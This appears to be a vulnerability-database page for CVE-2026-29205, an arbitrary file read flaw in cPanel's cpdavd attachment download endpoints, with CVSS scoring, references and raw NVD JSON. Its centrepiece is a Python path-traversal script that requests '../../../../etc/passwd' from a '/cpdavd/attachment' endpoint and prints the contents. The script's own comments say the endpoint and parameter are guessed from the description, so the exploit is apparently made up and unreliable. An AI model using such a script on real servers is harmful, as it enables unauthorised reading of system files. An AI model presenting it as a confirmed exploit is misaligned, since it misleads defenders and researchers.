CVE-2026-29205

Description

Incorrect privileges management and insufficient path filtering allow to read arbitrary file on the server via the cpdavd attachment download endpoints.

CVSS Details

CVSS Score

8.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

No configuration data available.

cPanel & WHM versions prior to Security Update released on May 13, 2026

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# PoC for CVE-2026-29205: cPanel cpdavd Arbitrary File Read
# Author: Security Analyst

# Target configuration (Replace with actual vulnerable host)
target_host = "http://target-cpanel-server:2082"
malicious_file = "../../../../etc/passwd"

# The vulnerable endpoint is related to cpdavd attachment download
# Based on the description, the path filtering is insufficient
url = f"{target_host}/cpdavd/attachment"

# Attempting to read a sensitive file using path traversal
params = {
    "file": malicious_file  # Parameter name might vary based on actual implementation
}

try:
    response = requests.get(url, params=params, timeout=10)
    if response.status_code == 200 and "root:x" in response.text:
        print("[+] Exploit successful! Arbitrary file read confirmed.")
        print("[+] File content:")
        print(response.text)
    else:
        print("[-] Exploit failed or target is patched.")
        print(f"Status Code: {response.status_code}")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-29205
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-29205
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-29205/
[4] VulDB https://vuldb.com/cve/CVE-2026-29205
[5] https://support.cpanel.net/hc/en-us/articles/40437020299927-Security-CVE-2026-29205-cPanel-WHM-WP2-Security-Update-May-13-2026

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-29205", "sourceIdentifier": "[email protected]", "published": "2026-05-13T22:16:42.817", "lastModified": "2026-05-14T18:30:57.103", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect privileges management and insufficient path filtering allow to read arbitrary file on the server via the cpdavd attachment download endpoints."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-250"}]}], "references": [{"url": "https://support.cpanel.net/hc/en-us/articles/40437020299927-Security-CVE-2026-29205-cPanel-WHM-WP2-Security-Update-May-13-2026", "source": "[email protected]"}]}}